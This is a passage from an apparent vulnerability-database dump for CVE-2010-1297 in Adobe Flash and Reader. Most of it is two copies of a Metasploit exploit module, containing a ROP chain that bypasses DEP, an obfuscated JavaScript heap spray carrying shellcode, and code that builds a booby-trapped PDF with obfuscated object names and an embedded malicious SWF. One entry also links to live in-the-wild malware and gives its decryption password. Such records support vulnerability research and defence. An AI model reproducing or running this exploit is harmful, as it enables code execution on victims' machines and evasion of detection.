'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 04 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# load the static swf file\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-1297.swf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\t@swf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tprint_status(\"Sending crafted PDF w/SWF to 
#{cli.peerhost}:#{cli.peerport}\")\r\n\r\n\t\tjs_data = make_js(regenerate_payload(cli).encoded)\r\n\t\tpdf_data = make_pdf(@swf_data, js_data)\r\n\t\tsend_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / 
ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / 
ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\\n\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % 
id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\r\n\r\n\t\txref = []\r\n\t\teol = \"\\n\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\t#pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog\")\r\n\t\tpdf << nObfu(\"/Pages \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/OpenAction \") << ioRef(5)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf 
<< compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\")\r\n\t\tpdf << nObfu(\"/Rect [20 20 187 69] \")\r\n\t\tpdf << nObfu(\"/RichMediaSettings \") << ioRef(8)\r\n\t\tpdf << nObfu(\"/RichMediaContent \") << ioRef(9)\r\n\t\tpdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Activation \") << ioRef(10)\r\n\t\tpdf << nObfu(\"/Deactivation \") << ioRef(11)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media content\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaContent\")\r\n\t\tpdf << nObfu(\"/Assets \") << ioRef(12)\r\n\t\tpdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\"\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(12)\r\n\t\tpdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media configuration\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14)\r\n\t\tpdf << 
nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(15)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Asset \") << ioRef(13)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << swf << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << \"trailer\" << eol\r\n\t\tpdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << \"%%EOF\" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16614/"}, {"lastseen": "2016-02-01T18:28:49", "description": "0day Exploit for Adobe Flash and Reader PoC (from the wild). CVE-2010-1297. 
Remote exploits for multiple platform", "published": "2010-06-09T00:00:00", "type": "exploitdb", "title": "Adobe Flash and Reader - Exploit PoC 0day", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-09T00:00:00", "id": "EDB-ID:13787", "href": "https://www.exploit-db.com/exploits/13787/", "sourceData": "# Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/\r\n\r\n# File is malicious! Taken from the wild! Beware!\r\n# To decrypt the file:\r\n# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar\r\n# Password is \"edb\" without the quotes.\r\n\r\nNOTE: This was taken out of live malware and was not modified. BEWARE.\r\n\r\nBy visiting the following link, you agree that you are responsible for any damages that occur.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc)\r\n\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13787/"}], "canvas": [{"lastseen": "2019-05-29T17:19:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "edition": 2, "description": "**Name**| flash_newfunction \n---|--- \n**CVE**| CVE-2010-1297 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Adobe Acrobat Flash Invalid newfunction call \n**Notes**| CVE Name: CVE-2010-1297 \nVENDOR: Adobe \nNOTES: Exploitation through an PDF file is more reliable than with a direct HTML/Flash exploit \nVersionsAffected: Acrobat 9.3 and below \nRepeatability: \nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297 \nReferences: http://www.adobe.com/support/security/advisories/apsb10-14.html \nDate public: 06/04/10 \nCVSS: 9.3 \n\n", "modified": "2010-06-08T18:30:00", "published": "2010-06-08T18:30:00", "id": "FLASH_NEWFUNCTION", 
"href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/flash_newfunction", "type": "canvas", "title": "Immunity Canvas: FLASH_NEWFUNCTION", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-27T01:39:31", "description": "This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.\n", "published": "2010-06-10T19:52:43", "type": "metasploit", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_FLASHPLAYER_NEWFUNCTION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use',\n 'Description' => %q{\n This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. 
An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due a the hardcoded syscall number.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Found being openly exploited\n 'jduck' # Metasploit version\n ],\n 'References' =>\n [\n ['CVE', '2010-1297'],\n ['OSVDB', '65141'],\n ['BID', '40586'],\n ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\n # For SWF->PDF embedding\n ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\n # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\n # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Jun 04 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n swf_data = make_swf()\n js_data = make_js(payload.encoded)\n\n # Create the pdf\n pdf = make_pdf(swf_data, js_data)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\n\n def make_swf\n # load the static swf file\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2010-1297.swf\" )\n fd = File.open( path, \"rb\" )\n swf_data = fd.read(fd.stat.size)\n fd.close\n swf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib 
using BIB.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0xc0c0c0c,\n 0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\n 0xcccccccc,\n 0x70048ef, # xchg eax,esp / ret\n 0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\n 0xcccccccc,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009033, # ret 0x18\n 0x7009084, # ret\n 0xc0c0c0c,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7001599, # pop ebp / ret\n 0x10124,\n 0x70072f7, # pop eax / ret\n 0x10104,\n 0x70015bb, # pop ecx / ret\n 0x1000,\n 0x700154d, # mov [eax], ecx / ret\n 0x70015bb, # pop ecx / ret\n 0x7ffe0300, # -- location of KiFastSystemCall\n 0x7007fb2, # mov eax, [ecx] / ret\n 0x70015bb, # pop ecx / ret\n 0x10011,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70015bb, # pop ecx / ret\n 0x10100,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70072f7, # pop eax / ret\n 0x10011,\n 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\n 0x7005c54, # pop esi / add esp,0x14 / ret\n 0xffffffff,\n 0x10100,\n 0x0,\n 0x10104,\n 0x1000,\n 0x40,\n # The next bit effectively copies data from the interleaved stack to the memory\n # pointed to by eax\n # The data copied is:\n # \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\n # \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\n # \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x70015bb, # pop ecx / ret\n 0x9054905a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5815eb5a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 
0x18891a8b,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x8304c083,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xfb8104c2,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xc0c0c0c,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5ebee75,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xffffe6e8,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x909090ff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90ffffff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x700112f # call eax -- (execute stub to transition to full shellcode)\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < 
#{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(swf, js)\n\n swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n #pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog\")\n pdf << n_obfu(\"/Pages \") << io_ref(3)\n pdf << n_obfu(\"/OpenAction \") << io_ref(5)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Count 1/Kids [\") << io_ref(4) << n_obfu(\"]>>\") << eol << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3)\n pdf << n_obfu(\"/Annots [\") << io_ref(7) << n_obfu(\"] \")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # js action\n xref << 
